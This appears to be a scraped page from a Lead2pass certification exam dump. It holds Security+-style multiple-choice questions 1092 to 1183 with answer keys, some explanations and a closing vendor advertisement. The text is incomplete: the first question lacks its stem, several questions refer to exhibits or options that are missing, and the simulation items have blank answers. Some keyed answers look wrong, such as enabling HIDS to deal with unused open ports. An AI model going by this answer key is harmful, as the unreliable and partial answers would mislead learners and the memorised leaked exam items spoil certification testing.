Which of the following types of attacks is being attempted and how can it be mitigated?
A. XSS; implement a SIEM
B. CSRF; implement an IPS
C. Directory traversal; implement a WAF
D. SQL injection; implement an IDS
Answer: C
QUESTION 1092
A security professional wants to enhance the protection of a critical environment that is used to
store and manage a company's encryption keys. The selected technology should be tamper
resistant. Which of the following should the security professional implement to achieve the goal?
A. DLP
B. HSM
C. CA
D. FIM
Answer: B
QUESTION 1093
Which of the following is the correct order of volatility from most to least volatile?
A. Memory, temporary filesystems, routing tables, disk, network storage
B. Cache memory, temporary filesystems, disk, archival media
C. Memory, disk temporary filesystems, cache, archival media
D. Cache, disk, temporary filesystems, network storage, archival media
Answer: B
QUESTION 1094
A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase
of ransomware-as-a-service in a report to the management team. Which of the following best
describes the threat actor in the CISO's report?
A. Insider threat
B. Hacktivist
C. Nation-state
D. Organized crime
Answer: D
QUESTION 1095
Which of the following agreements defines response time, escalation points, and performance
metrics?
A. BPA
B. MOA
C. NDA
D. SLA
Answer: D
QUESTION 1096
A bakery has a secret recipe that it wants to protect. Which of the following objectives should be
added to the company's security awareness training?
A. Insider threat detection
B. Risk analysis
C. Phishing awareness
D. Business continuity planning
Answer: A
QUESTION 1097
Which of the following must be considered when designing a high-availability network? (Choose
two.)
A. Ease of recovery
B. Ability to patch
C. Physical isolation
D. Responsiveness
E. Attack surface
F. Extensible authentication
Answer: AD
QUESTION 1098
Which of the following strategies shifts risks that are not covered in an organization's risk
strategy?
A. Risk transference
B. Risk avoidance
C. Risk mitigation
D. Risk acceptance
Answer: A
QUESTION 1099
A dynamic application vulnerability scan identified that code injection could be performed using a
web form. Which of the following will be the best remediation to prevent this vulnerability?
A. Implement input validations
B. Deploy MFA
C. Utilize a WAF
D. Configure HIPS
Answer: A
QUESTION 1100
A security administrator needs a method to secure data in an environment that includes some
form of checks so that the administrator can track any changes. Which of the following should the
administrator set up to achieve this goal?
A. SPF
B. GPO
C. NAC
D. FIM
Answer: D
QUESTION 1101
An analyst is working on an email security incident in which the target opened an attachment
containing a worm. The analyst wants to implement mitigation techniques to prevent further
spread. Which of the following is the best course of action for the analyst to take?
A. Apply a DLP solution.
B. Implement network segmentation.
C. Utilize email content filtering.
D. Isolate the infected attachment.
Answer: B
QUESTION 1102
Sales team members have been receiving threatening voicemail messages and have reported
these incidents to the IT security team. Which of the following would be MOST appropriate for the
IT security team to analyze?
A. Access control
B. Syslog
C. Session Initiation Protocol traffic logs
D. Application logs
Answer: C
QUESTION 1103
Which of the following can be used to calculate the total loss expected per year due to a threat
targeting an asset?
A. EF x asset value
B. ALE / SLE
C. MTBF x impact
D. SLE x ARO
Answer: D
QUESTION 1104
A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of
the following solutions should the engineer implement FIRST? (Choose two.)
A. Auto-update
B. HTTP headers
C. Secure cookies
D. Third-party updates
E. Full disk encryption
F. Sandboxing
G. Hardware encryption
Answer: AF
QUESTION 1105
Which of the following authentication methods is considered to be the LEAST secure?
A. TOTP
B. SMS
C. HOTP
D. Token key
Answer: B
QUESTION 1106
Employees in the research and development business unit receive extensive training to ensure
they understand how to best protect company data. Which of the following is the type of data
these employees are most likely to use in day-to-day work activities?
A. Encrypted
B. Intellectual property
C. Critical
D. Data in transit
Answer: B
QUESTION 1107
An audit report indicates multiple suspicious attempts to access company resources were made.
These attempts were not detected by the company. Which of the following would be the best
solution to implement on the company's network?
A. Intrusion prevention system
B. Proxy server
C. Jump server
D. Security zones
Answer: A
QUESTION 1108
An administrator identifies some locations on the third floor of the building that have a poor
wireless signal. Multiple users confirm the incident and report it is not an isolated event. Which of
the following should the administrator use to find the areas with a poor or non-existent wireless
signal?
A. Heat map
B. Input validation
C. Site survey
D. Embedded systems
Answer: C
QUESTION 1109
Which of the following has been implemented when a host-based firewall on a legacy Linux
system allows connections from only specific internal IP addresses?
A. Compensating control
B. Network segmentation
C. Transfer of risk
D. SNMP traps
Answer: B
QUESTION 1110
An attacker tricks a user into providing confidential information. Which of the following describes
this form of malicious reconnaissance?
A. Phishing
B. Social engineering
C. Typosquatting
D. Smishing
Answer: B
QUESTION 1111
A large bank with two geographically dispersed data centers is concerned about major power
disruptions at both locations. Every day each location experiences very brief outages that last for
a few seconds. However, during the summer a high risk of intentional under-voltage events that
could last up to an hour exists, particularly at one of the locations near an industrial smelter.
Which of the following is the best solution to reduce the risk of data loss?
A. Dual supply
B. Generator
C. PDU
D. Daily backups
Answer: B
QUESTION 1112
Which of the following examples would be best mitigated by input sanitization?
A.
B. nmap -p- 10.11.1.130
C. Email message: "Click this link to get your free gift card."
D. Browser message: "Your connection is not private."
Answer: A
QUESTION 1113
An organization would like to store customer data on a separate part of the network that is not
accessible to users on the main corporate network. Which of the following should the
administrator use to accomplish this goal?
A. Segmentation
B. Isolation
C. Patching
D. Encryption
Answer: B
QUESTION 1114
A company is adding a clause to its AUP that states employees are not allowed to modify the
operating system on mobile devices. Which of the following vulnerabilities is the organization
addressing?
A. Cross-site scripting
B. Buffer overflow
C. Jailbreaking
D. Side loading
Answer: C
QUESTION 1115
A company is expanding its threat surface program and allowing individuals to security test the
company's internet-facing application. The company will compensate researchers based on the
vulnerabilities discovered. Which of the following best describes the program the company is
setting up?
A. Open-source intelligence
B. Bug bounty
C. Red team
D. Penetration testing
Answer: B
QUESTION 1116
An organization experiences a cybersecurity incident involving a command-and-control server.
Which of the following logs should be analyzed to identify the impacted host? (Choose two.)
A. Application
B. Authentication
C. Error
D. Network
E. Firewall
F. System
Answer: DE
QUESTION 1117
An administrator assists the legal and compliance team with ensuring information about customer
transactions is archived for the proper time period. Which of the following data policies is the
administrator carrying out?
A. Compromise
B. Retention
C. Analysis
D. Transfer
E. Inventory
Answer: B
QUESTION 1118
While troubleshooting a firewall configuration, a technician determines that a "deny any" policy
should be added to the bottom of the ACL. The technician updates the policy, but the new policy
causes several company servers to become unreachable. Which of the following actions would
prevent this issue?
A. Documenting the new policy in a change request and submitting the request to change
management
B. Testing the policy in a non-production environment before enabling the policy in the production
network
C. Disabling any intrusion prevention signatures on the "deny any" policy prior to enabling the new
policy
D. Including an "allow any" policy above the "deny any" policy
Answer: B
QUESTION 1119
Which of the following security concepts should an e-commerce organization apply for protection
against erroneous purchases?
A. Privacy
B. Availability
C. Integrity
D. Confidentiality
Answer: C
QUESTION 1120
Which of the following threat vectors would appear to be the most legitimate when used by a
malicious actor to impersonate a company?
A. Phone call
B. Instant message
C. Email
D. Text message
Answer: C
QUESTION 1121
Which of the following should a security administrator adhere to when setting up a new set of
firewall rules?
A. Disaster recovery plan
B. Incident response procedure
C. Business continuity plan
D. Change management procedure
Answer: D
QUESTION 1122
During an engagement, penetration testers left USB keys that contained specially crafted
malware in the company's parking lot. A couple days later, the malware contacted the command-and-control server, giving the penetration testers unauthorized access to the company endpoints.
Which of the following will most likely be a recommendation in the engagement report?
A. Conduct an awareness campaign on the usage of removable media.
B. Issue a user guidance program focused on vishing campaigns.
C. Implement more complex password management practices.
D. Establish a procedure on identifying and reporting suspicious messages.
Answer: A
QUESTION 1123
A company recently experienced a significant data loss when proprietary information was leaked
to a competitor. The company took special precautions by using proper labels; however, email
filter logs do not have any record of the incident. An investigation confirmed the corporate
network was not breached, but documents were downloaded from an employee's COPE tablet
and passed to the competitor via cloud storage. Which of the following is the best mitigation
strategy to prevent this from happening in the future?
A. User training
B. CASB
C. MDM
D. EDR
Answer: B
QUESTION 1124
Which of the following roles, according to the shared responsibility model, is responsible for
securing the company's database in an IaaS model for a cloud environment?
A. Client
B. Third-party vendor
C. Cloud provider
D. OBA
Answer: A
QUESTION 1125
Which of the following tools can assist with detecting an employee who has accidentally emailed
a file containing a customer's PII?
A. SCAP
B. NetFlow
C. Antivirus
D. DLP
Answer: D
QUESTION 1126
A bank insists all of its vendors must prevent data loss on stolen laptops. Which of the following
strategies is the bank requiring?
A. Encryption at rest
B. Masking
C. Data classification
D. Permission restrictions
Answer: A
QUESTION 1127
After a recent vulnerability scan, a security engineer needs to harden the routers within the
corporate network. Which of the following is the most appropriate to disable?
A. Console access
B. Routing protocols
C. VLANs
D. Web-based administration
Answer: D
QUESTION 1128
A company requires hard drives to be securely wiped before sending decommissioned systems
to recycling. Which of the following best describes this policy?
A. Enumeration
B. Sanitization
C. Destruction
D. Inventory
Answer: B
QUESTION 1129
An attacker posing as the Chief Executive Officer calls an employee and instructs the employee
to buy gift cards. Which of the following techniques is the attacker using?
A. Smishing
B. Phishing
C. Impersonating
D. Vishing
Answer: C
QUESTION 1130
During the onboarding process, an employee needs to create a password for an intranet account.
The password must include ten characters, numbers, and letters, and two special characters.
Once the password is created, the company will grant the employee access to other company-owned websites based on the intranet profile. Which of the following access management
concepts is the company most likely using to safeguard intranet accounts and grant access to
multiple sites based on a user's intranet account? (Choose two.)
A. Federation
B. Identity proofing
C. Password complexity
D. Default password changes
E. Password manager
F. Open authentication
Answer: AC
QUESTION 1131
A manufacturing organization wants to control and monitor access from the internal business
network to the segregated production network, while ensuring minimal exposure of the production
network to devices. Which of the following solutions would best accomplish this goal?
A. Proxy server
B. NGFW
C. WAF
D. Jump server
Answer: D
QUESTION 1132
Which of the following best describes a use case for a DNS sinkhole?
A. Attackers can see a DNS sinkhole as a highly valuable resource to identify a company's domain
structure.
B. A DNS sinkhole can be used to draw employees away from known-good websites to malicious
ones owned by the attacker.
C. A DNS sinkhole can be used to capture traffic to known-malicious domains used by attackers.
D. A DNS sinkhole can be set up to attract potential attackers away from a company's network
resources.
Answer: C
QUESTION 1133
Which of the following explains why an attacker cannot easily decrypt passwords using a rainbow
table attack?
A. Digital signatures
B. Salting
C. Hashing
D. Perfect forward secrecy
Answer: B
QUESTION 1134
A company reduced the area utilized in its data center by creating virtual networking through
automation and by creating provisioning routes and rules through scripting. Which of the following
does this example describe?
A. IaC
B. MSSP
C. Containers
D. SaaS
Answer: A
QUESTION 1135
Historically, a company has had issues with users plugging in personally owned removable media
devices into corporate computers. As a result, the threat of malware incidents is almost constant.
Which of the following would best help prevent the malware from being installed on the
computers?
A. AUP
B. NGFW
C. DLP
D. EDR
Answer: D
QUESTION 1136
While investigating a recent security breach, an analyst finds that an attacker gained access by
SQL injection through a company website. Which of the following should the analyst recommend
to the website developers to prevent this from reoccurring?
A. Secure cookies
B. Input sanitization
C. Code signing
D. Blocklist
Answer: B
QUESTION 1137
Which of the following best describes the risk that is present once mitigations are applied?
A. Control risk
B. Residual risk
C. Inherent risk
D. Risk awareness
Answer: B
QUESTION 1138
A security architect at a large, multinational organization is concerned about the complexities and
overhead of managing multiple encryption keys securely in a multicloud provider environment.
The security architect is looking for a solution with reduced latency to allow the incorporation of
the organization's existing keys and to maintain consistent, centralized control and management
regardless of the data location. Which of the following would best meet the architect's objectives?
A. Trusted Platform Module
B. IaaS
C. HSMaaS
D. PaaS
Answer: C
Explanation:
HSM as a Service (HSMaaS): hardware security modules (HSMs) are fortified, tamper-resistant
hardware components that generate, safeguard, and manage the keys used to encrypt and decrypt
data and to create digital signatures and certificates.
QUESTION 1139
Which of the following best represents an application that does not have an on-premises
requirement and is accessible from anywhere?
A. PaaS
B. Hybrid cloud
C. Private cloud
D. IaaS
E. SaaS
Answer: E
QUESTION 1140
During an investigation, events from two affected servers in the same subnetwork occurred at the
same time:
Server 1: 192.168.10.1 [01/Apr/2021:06:00:00 PST] SAN access denied for user 'admin'
Server 2: 192.168.10.6 [01/Apr/2021:06:01:01 CST] SAN access successful for user 'admin'
Which of the following should be consistently configured to prevent the issue seen in the logs?
A. Geolocation
B. TOTP
C. NTP
D. MFA
Answer: C
QUESTION 1141
The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The
systems administrator researched the vulnerability and discovered the domain controller does not
run the associated application with the vulnerability. Which of the following steps should the
administrator take next?
A. Ensure the scan engine is configured correctly.
B. Apply a patch to the domain controller.
C. Research the CVE.
D. Document this as a false positive.
Answer: D
QUESTION 1142
A company has decided to move its operations to the cloud. It wants to utilize technology that will
prevent users from downloading company applications for personal use, restrict data that is
uploaded, and have visibility into which applications are being used across the company. Which
of the following solutions will best meet these requirements?
A. An NGFW
B. A CASB
C. Application whitelisting
D. An NG-SWG
Answer: B
Explanation:
A Cloud Access Security Broker (CASB) would best meet the requirements stated in the
scenario. CASBs can provide visibility into which cloud applications are being used across a
company, restrict data that is uploaded to the cloud, and prevent unauthorized downloading of
company applications for personal use. They act as a gatekeeper, allowing the organization to
extend its security policies beyond its own infrastructure. CASBs provide features like visibility,
data security, threat protection, and compliance, ensuring secure and only authorized use of
cloud services by employees.
QUESTION 1143
An internet company has created a new collaboration application. To expand the user base, the
company wants to implement an option that allows users to log in to the application with the
credentials of other popular websites. Which of the following should the company implement?
A. SSO
B. CHAP
C. 802.1x
D. OpenID
Answer: D
Explanation:
It's using sign-in credentials from OTHER popular websites. An example of this would be logging
into CompTIA using a Google/Gmail account. OpenID uses SSO. However, SSO is more broad,
and I feel OpenID perfectly fits this scenario.
QUESTION 1144
Following a prolonged data center outage that affected web-based sales, a company has decided
to move its operations to a private cloud solution. The security team has received the following
requirements:
- There must be visibility into how teams are using cloud-based services.
- The company must be able to identify when data related to payment cards is being sent to the cloud.
- Data must be available regardless of the end user's geographic location.
- Administrators need a single pane-of-glass view into traffic and trends.
Which of the following should the security analyst recommend?
A. Create firewall rules to restrict traffic to other cloud service providers.
B. Install a DLP solution to monitor data in transit.
C. Implement a CASB solution.
D. Configure a web-based content filter.
Answer: C
QUESTION 1145
A recent malware outbreak across a subnet included successful rootkit installations on many
PCs, ensuring persistence by rendering remediation efforts ineffective. Which of the following
would best detect the presence of a rootkit in the future?
A. FDE
B. NIDS
C. EDR
D. DLP
Answer: C
Explanation:
EDR (Endpoint Detection and Response) is the most suitable solution among the given options
for detecting the presence of a rootkit. EDR solutions continuously monitor and collect data from
endpoints, looking for suspicious activities and behavior patterns that might indicate the presence
of malware, including rootkits. They also provide tools for investigating and responding to security
incidents, making them effective for dealing with sophisticated threats that can evade traditional
antivirus solutions.
QUESTION 1146
An organization is building a single virtual environment that will host customer applications and
data that require availability at all times. The data center that is hosting the environment will
provide generator power and ISP services. Which of the following is the best solution to support
the organization's requirement?
A. NIC teaming
B. Cloud backups
C. A load balancer appliance
D. UPS
Answer: D
Explanation:
While NIC teaming, cloud backups, and load balancer appliances are all important for different
aspects of an IT infrastructure, they do not directly address the need for continuous power
availability, which is the primary concern in this scenario. UPS, in combination with backup
generators and ISP services, helps ensure that the data center remains operational even during
power-related issues.
QUESTION 1147
A new company wants to avoid channel interference when building a WLAN. The company needs
to know the radio frequency behavior, identify dead zones, and determine the best place for
access points. Which of the following should be done first?
A. Configure heat maps.
B. Utilize captive portals.
C. Conduct a site survey.
D. Install Wi-Fi analyzers.
Answer: C
QUESTION 1148
The following IP information was provided to internal auditors to help assess organizational
security:
Which of the following tools would most likely be used to perform network reconnaissance and
help understand what is accessible to all users? (Choose two.)
A. ipconfig
B. ping
C. chmod
D. netstat
E. traceroute
F. route
Answer: BE
QUESTION 1149
A software company adopted the following processes before releasing software to production:
- Peer review
- Static code scanning
- Signing
A considerable number of vulnerabilities are still being detected when code is executed on
production. Which of the following security tools can improve vulnerability detection on this
environment?
A. File integrity monitoring for the source code
B. Dynamic code analysis tool
C. Encrypted code repository
D. Endpoint detection and response solution
Answer: B
QUESTION 1150
A security analyst needs to harden access to a network. One of the requirements is to
authenticate users with smart cards. Which of the following should the analyst enable to best
meet this requirement?
A. CHAP
B. PEAP
C. MS-CHAPv2
D. EAP-TLS
Answer: D
Explanation:
EAP-TLS is a strong and secure authentication method that involves the use of digital certificates,
typically stored on smart cards, for user authentication. It requires the user to present a valid
certificate, which is verified by the authentication server, providing a high level of security.
QUESTION 1151
A penetration-testing firm is working with a local community bank to create a proposal that best
fits the needs of the bank. The bank's information security manager would like the penetration
test to resemble a real attack scenario, but it cannot afford the hours required by the penetration-testing firm. Which of the following would best address the bank's desired scenario and budget?
A. Engage the penetration-testing firm's red-team services to fully mimic possible attackers.
B. Give the penetration tester data diagrams of core banking applications in a known-environment
test.
C. Limit the scope of the penetration test to only the system that is used for teller workstations.
D. Provide limited networking details in a partially known-environment test to reduce reconnaissance
efforts.
Answer: D
QUESTION 1152
A security analyst is reviewing SIEM logs during an ongoing attack and notices the following:
Which of the following best describes the type of attack?
A. SQLi
B. CSRF
C. API attacks
D. Directory traversal
Answer: D
QUESTION 1153
A certificate vendor notified a company that recently invalidated certificates may need to be
updated. Which of the following mechanisms should a security administrator use to determine
whether the certificates installed on the company's machines need to be updated?
A. SCEP
B. OCSP
C. CSR
D. CRL
Answer: D
Explanation:
From a practical standpoint, an administrator would use automation to compare all existing
certificates with the revocation list, but could potentially also script an OCSP query for each
certificate in the environment. Either option seems valid, but CRL is the better option from an
enterprise-wide scanning perspective.
QUESTION 1154
A recent vulnerability scan revealed multiple servers have non-standard ports open for
applications that are no longer in use. The security team is working to ensure all devices are
patched and hardened. Which of the following would the security team perform to ensure the task
is completed with minimal impact to production?
A. Enable HIDS on all servers and endpoints.
B. Disable unnecessary services.
C. Configure the deny list appropriately on the NGFW.
D. Ensure the antivirus is up to date.
Answer: A
QUESTION 1155
An employee fell for a phishing scam, which allowed an attacker to gain access to a company
PC. The attacker scraped the PC's memory to find other credentials. Without cracking these
credentials, the attacker used them to move laterally through the corporate network. Which of the
following describes this type of attack?
A. Privilege escalation
B. Buffer overflow
C. SQL injection
D. Pass-the-hash
Answer: D
Explanation:
Unlike other credential theft attacks, a pass-the-hash attack does not require the attacker to know
or crack the password to gain access to the system. Rather, it uses the stored hash of the
password to initiate a new session.
QUESTION 1156
Which of the following is a common source of unintentional corporate credential leakage in cloud
environments?
A. Code repositories
B. Dark web
C. Threat feeds
D. State actors
E. Vulnerability databases
Answer: A
Explanation:
Code repositories: Developers sometimes inadvertently include sensitive information, such as
API keys, passwords, and other credentials, in their code. When this code is pushed to public
repositories (e.g., GitHub, GitLab), those credentials can be exposed to the world, leading to
potential credential leakage.
QUESTION 1157
A company is designing the layout of a new data center so it will have an optimal environmental
temperature. Which of the following must be included? (Choose two.)
A. An air gap
B. A cold aisle
C. Removable doors
D. A hot aisle
E. An IoT thermostat
F. A humidity monitor
Answer: BD
QUESTION 1158
A privileged user at a company stole several proprietary documents from a server. The user also
went into the log files and deleted all records of the incident. The systems administrator has just
informed investigators that other log files are available for review. Which of the following did the
administrator most likely configure that will assist the investigators?
A. Memory dumps
B. The syslog server
C. The application logs
D. The log retention policy
Answer: B
QUESTION 1159
Local guidelines require that all information systems meet a minimum security baseline to be
compliant. Which of the following can security administrators use to assess their system
configurations against the baseline?
A. SOAR playbook
B. Security control matrix
C. Risk management framework
D. Benchmarks
Answer: D
Explanation:
Benchmarks: Security benchmarks provide standardized sets of best practices and settings that
help ensure the secure configuration of an operating system or application. Organizations such
as the Center for Internet Security (CIS) provide security benchmarks that can be used to
evaluate and harden systems to meet security baselines.
QUESTION 1160
A company's public-facing website, https://www.organization.com, has an IP address of
166.18.75.6. However, over the past hour the SOC has received reports of the site's homepage
displaying incorrect information. A quick nslookup search shows https://www.organization.com is
pointing to 151.191.122.115. Which of the following is occurring?
A. DoS attack
B. ARP poisoning
C. DNS spoofing
D. NXDOMAIN attack
Answer: C
Explanation:
Domain Name Server (DNS) spoofing, or DNS cache poisoning, is an attack involving
manipulating DNS records to redirect users toward a fraudulent, malicious website that may
resemble the user’s intended destination.
QUESTION 1161
An employee receives an email stating the employee won the lottery. The email includes a link
that requests a name, mobile phone number, address, and date of birth be provided to confirm
the employee's identity before sending the prize. Which of the following best describes this type of
email?
A. Spear phishing
B. Whaling
C. Phishing
D. Vishing
Answer: C
QUESTION 1162
A company currently uses passwords for logging in to company-owned devices and wants to add
a second authentication factor. Per corporate policy, users are not allowed to have smartphones
at their desks. Which of the following would meet these requirements?
A. Smart card
B. PIN code
C. Knowledge-based question
D. Secret key
Answer: A
QUESTION 1163
The Chief Technology Officer of a local college would like visitors to utilize the school's Wi-Fi but
must be able to associate potential malicious activity to a specific person. Which of the following
would best allow this objective to be met?
A. Requiring all new, on-site visitors to configure their devices to use WPS
B. Implementing a new SSID for every event hosted by the college that has visitors
C. Creating a unique PSK for every visitor when they arrive at the reception area
D. Deploying a captive portal to capture visitors' MAC addresses and names
Answer: D
QUESTION 1164
Which of the following is most likely associated with introducing vulnerabilities on a corporate
network by the deployment of unapproved software?
A. Hacktivists
B. Script kiddies
C. Competitors
D. Shadow IT
Answer: D
Explanation:
Shadow IT refers to information technology systems used within organizations without explicit
organizational approval.
QUESTION 1165
A cybersecurity incident response team at a large company receives notification that malware is
present on several corporate desktops. No known indicators of compromise have been found on
the network. Which of the following should the team do first to secure the environment?
A. Contain the impacted hosts.
B. Add the malware to the application blocklist.
C. Segment the core database server.
D. Implement firewall rules to block outbound beaconing.
Answer: A
QUESTION 1166
An administrator receives the following network requirements for a data integration with a third-party vendor:
Which of the following is the most appropriate response for the administrator to send?
A. FTP is an insecure protocol and should not be used.
B. Port 8080 is a non-standard port and should be blocked.
C. SSH protocol version 1 is obsolete and should not be used.
D. Certificate stapling on port 443 is a security risk that should be mitigated.
Answer: A
QUESTION 1167
A security administrator manages five on-site APs. Each AP uses different channels on a 5GHz
network. The administrator notices that another access point with the same corporate SSID on an
overlapping channel was created. Which of the following attacks most likely occurred?
A. Jamming
B. NFC attacks
C. Disassociation
D. Bluesnarfing
E. Evil twin
Answer: E
QUESTION 1168
A security team has been alerted to a flood of incoming emails that have various subject lines and
are addressed to multiple email inboxes. Each email contains a URL shortener link that is
redirecting to a dead domain. Which of the following is the best step for the security team to take?
A. Create a blocklist for all subject lines.
B. Send the dead domain to a DNS sinkhole.
C. Quarantine all emails received and notify all employees.
D. Block the URL shortener domain in the web proxy.
Answer: D
QUESTION 1169
SIMULATION
A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.
INSTRUCTIONS
Please click on the below items on the network diagram and configure them accordingly:
- WAP
- DHCP Server
- AAA Server
- Wireless Controller
- LDAP Server
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
QUESTION 1170
A data administrator is configuring authentication for a SaaS application and would like to reduce
the number of credentials employees need to maintain. The company prefers to use domain
credentials to access new SaaS applications. Which of the following methods would allow this
functionality?
A. SSO
B. LEAP
C. MFA
D. PEAP
Answer: A
QUESTION 1171
Which of the following would be best suited for constantly changing environments?
A. RTOS
B. Containers
C. Embedded systems
D. SCADA
Answer: B
Explanation:
Containers are well-suited for constantly changing environments because they provide a
consistent and isolated environment for applications to run, regardless of the underlying
infrastructure. They are highly portable and can be quickly deployed, making them a flexible
solution for dynamic environments where applications need to be scaled, updated, or moved
frequently. Real-time operating systems (RTOS) are designed for predictable and deterministic
tasks, while embedded systems and SCADA are more specialized and may not be as adaptable
to rapidly changing conditions.
QUESTION 1172
A newly identified network access vulnerability has been found in the OS of legacy IoT devices.
Which of the following would best mitigate this vulnerability quickly?
A. Insurance
B. Patching
C. Segmentation
D. Replacement
Answer: C
QUESTION 1173
The local administrator account for a company's VPN appliance was unexpectedly used to log in
to the remote management interface. Which of the following would have prevented this from
happening?
A. Using least privilege
B. Changing the default password
C. Assigning individual user IDs
D. Implementing multifactor authentication
Answer: D
QUESTION 1174
Which of the following describes the exploitation of an interactive process to gain access to
restricted areas?
A. Persistence
B. Port scanning
C. Privilege escalation
D. Pharming
Answer: C
QUESTION 1175
A security analyst is assessing several company firewalls. Which of the following tools would the
analyst most likely use to generate custom packets to use during the assessment?
A. hping
B. Wireshark
C. PowerShell
D. netstat
Answer: A
QUESTION 1176
A local business was the source of multiple instances of credit card theft. Investigators found that
most payments at this business were made at self-service kiosks. Which of the following is the
most likely cause of the exposed credit card information?
A. Insider threat
B. RAT
C. Backdoor
D. Skimming
E. NFC attack
Answer: D
QUESTION 1177
An employee recently resigned from a company. The employee was responsible for managing
and supporting weekly batch jobs over the past five years. A few weeks after the employee
resigned, one of the batch jobs failed and caused a major disruption. Which of the following would
work best to prevent this type of incident from reoccurring?
A. Job rotation
B. Retention
C. Outsourcing
D. Separation of duties
Answer: D
QUESTION 1178
Following a recent security breach, an analyst discovered that user permissions were added
when joining another part of the organization but were not removed from existing groups. Which
of the following policies would help to correct these issues in the future?
A. Service accounts
B. Account audits
C. Password complexity
D. Lockout policy
Answer: B
QUESTION 1179
Which of the following ensures an organization can continue to do business with minimal
interruption in the event of a major disaster?
A. Business recovery plan
B. Incident response plan
C. Communication plan
D. Continuity of operations plan
Answer: D
QUESTION 1180
In a rush to meet an end-of-year business goal, the IT department was told to implement a new
business application. The security engineer reviews the attributes of the application and decides
the time needed to perform due diligence is insufficient from a cybersecurity perspective. Which
of the following BEST describes the security engineer's response?
A. Risk tolerance
B. Risk acceptance
C. Risk importance
D. Risk appetite
Answer: B
QUESTION 1181
DRAG DROP
A security engineer is setting up passwordless authentication for the first time.
INSTRUCTIONS
Drag and drop the MINIMUM set of commands to set this up and verify that it works. Commands
may only be used once, and not all will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
QUESTION 1182
Hotspot Question
You are a security administrator investigating a potential infection on a network.
INSTRUCTIONS
Click on each host and firewall. Review all logs to determine which host originated the infection
and then identify if each remaining host is clean or infected.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
QUESTION 1183
Drag and Drop Question
A data owner has been tasked with assigning proper data classifications and destruction methods
for various types of data contained within the environment.
INSTRUCTIONS
From the options below, drag each item to its appropriate classification as well as the MOST
appropriate form of disposal.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
About Lead2pass.com
Lead2pass.com was founded in 2006. We provide the latest, high-quality IT Certification Training
Exam Questions, Study Guides, and Practice Tests. We lead the way to help you pass any IT Certification
exam, 100% Pass Guaranteed or Full Refund, especially Cisco, Microsoft, CompTIA, Citrix, EMC,
HP, Oracle, VMware, Juniper, Check Point, LPI, Nortel, EXIN and so on.
Our Slogan: First Test, First Pass.
We help you pass any IT Certification exam on the first try.
You can reach us at any of the email addresses listed below.
Sales: sales@lead2pass.com
Support: support@lead2pass.com
Technical Assistance Center: technology@lead2pass.com
For any problems with IT certification or our products, you can rely on us; we will give you
satisfactory answers within 24 hours.
View list of all certification exams: http://www.lead2pass.com/all-products.html